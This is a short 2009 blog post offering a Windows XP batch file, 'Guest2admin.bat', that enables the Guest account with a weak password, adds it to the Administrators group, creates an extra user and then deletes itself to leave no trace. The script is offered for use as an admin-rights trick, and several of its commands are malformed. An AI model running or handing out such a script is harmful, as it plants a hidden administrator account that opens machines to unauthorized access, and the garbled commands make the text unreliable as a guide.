Convert Guest to admin in windows XP
Posted by SantY in Windows XP on Thursday, July 16, 2009
Convert Guest to admin in windows Xp
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Type it in NOTEPAD and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...
Note : Make sure that you have Guest profile on
This entry was posted on Thursday, July 16, 2009 at 4:40 PM and is filed under Windows XP. You can follow any responses to this entry through the RSS 2.0. You can leave a response.
- No comments yet.